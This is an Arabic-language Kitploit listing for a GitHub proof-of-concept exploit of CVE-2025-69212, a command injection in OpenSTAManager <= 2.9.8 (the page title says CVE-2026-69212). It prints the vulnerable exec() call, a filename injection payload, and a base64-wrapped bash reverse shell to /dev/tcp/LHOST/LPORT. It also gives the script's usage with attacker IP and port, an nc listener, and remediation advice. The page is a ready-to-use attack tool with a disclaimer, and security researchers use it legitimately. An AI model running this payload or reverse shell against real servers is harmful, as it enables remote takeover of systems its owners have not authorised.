Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-69212 — python poc، استغلال لـ CVE-2025-69212 | Kitploit
أدوات/GitHubGitHub/c0gnit00/cve-2026-69212
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

python poc، استغلال لـ CVE-2025-69212

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69212 — حقن أوامر نظام التشغيل في OpenSTAManager (RCE)

إثبات المفهوم لاستغلال CVE-2025-69212، وهي ثغرة حقن أوامر نظام التشغيل (OS Command Injection) في OpenSTAManager <= 2.9.8 التي تسمح لمهاجم موثوق بتحقيق تنفيذ أوامر عن بُعد (Remote Code Execution) عبر تحميل ملف ZIP تم التلاعب به بشكل ضار.

تنبيه (Advisory)

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • الإصدارات المتأثرة: OpenSTAManager <= 2.9.8
  • تم الإصلاح في: OpenSTAManager 2.9.9+
  • CVSS: حرجة (Critical)

تفاصيل الثغرة

توجد الثغرة في src/Util/XML.php عند السطر ~100، حيث يمرر التطبيق اسم ملف يتحكم به المستخدم مباشرة إلى استدعاء exec() في قشرة النظام دون تعقيم:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

عند تحميل أرشيف ZIP عبر مكون importFE_ZIP (/actions.php)، يقوم التطبيق باستخراج المحتوى ويمرر اسم كل مدخل .p7m إلى exec(). يمكن للمهاجم إنشاء ZIP باسم ملف ضار يؤدي إلى الخروج من الوسيطة المقتبسة (double-quoted argument) وحقن أوامر قشرة عشوائية.

حمولة الحقن (اسم الملف):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

التنفيذ الناتج في القشرة:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ تم حقنها هنا

ملاحظة: لا يمكن أن يظهر الشرطة المائلة للأمام / مباشرة في اسم الملف لأن ZipArchive::extractTo() يتعامل معها كفاصل مسار. يتجنب إثبات المفهوم (PoC) ذلك عن طريق ترميز حمولة القشرة العكسية (reverse shell) بصيغة base64.


المتطلبات

  • Python 3.x
  • مكتبة requests
  • بيانات اعتماد صالحة لـ OpenSTAManager (أي دور يتمتع بإمكانية الوصول إلى مكون الاستيراد)
  • جهاز استماع على جهاز المهاجم (مثل nc)

تثبيت التبعيات:

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

الخيارات

مثال

root@kitploit:~
# بدء المستمع
nc -lvnp 4444

# تشغيل أداة الاستغلال
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# التوجيه عبر Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

كيف يعمل

  1. المصادقة — تسجيل الدخول إلى OpenSTAManager باستخدام بيانات الاعتماد المقدمة
  2. بناء الحمولة — إنشاء أرشيف ZIP يحتوي على ملف .p7m يتضمن اسمه الأمر المحقون
  3. ترميز Base64 — يتم ترميم القشرة العكسية (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) بصيغة base64 لتجنب الشرط المائلة للأمام في اسم الملف
  4. التحميل — إرسال ZIP إلى /actions.php عبر مكون importFE_ZIP
  5. التنفيذ — يقوم الخادم باستخراج ZIP، ويمرر اسم الملف الخبيث إلى exec()، مما يؤدي إلى تشغيل القشرة العكسية
  6. الخيوط (Threading) — يعمل التحميل في خيط خفي (daemon thread) لأن bash يبقي اتصال HTTP مفتوحًا؛ ينتهي البرنامج النصي بشكل نظيف دون انتظار استجابة

الإصلاح

قم بالتحديث إلى OpenSTAManager 2.9.9 أو أحدث، والذي يقوم بتعقيم أسماء الملفات قبل تمريرها إلى أوامر القشرة.

إذا لم يكن التصحيح فوريًا ممكنًا، قم بتعطيل مكون importFE_ZIP أو تقييد الوصول إلى /actions.php للمستخدمين الموثوقين فقط.


إخلاء المسؤولية

هذه الأداة مخصصة لأغراض اختبار الأمان المصرح به والأغراض التعليمية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني وغير أخلاقي. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


المراجع

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
تنزيل الأداة
الوسيط (Argument)مطلوبالوصف
-u, --urlنعمعنوان URL الأساسي للهدف (مثل http://target.htb)
-U, --usernameنعماسم المستخدم في OpenSTAManager
-P, --passwordنعمكلمة المرور في OpenSTAManager
--lhostنعمعنوان IP الخاص بك للقشرة العكسية
--lportنعممنفذ الاستماع الخاص بك للقشرة العكسية
--proxyلاوسيط HTTP (مثل http://127.0.0.1:8080)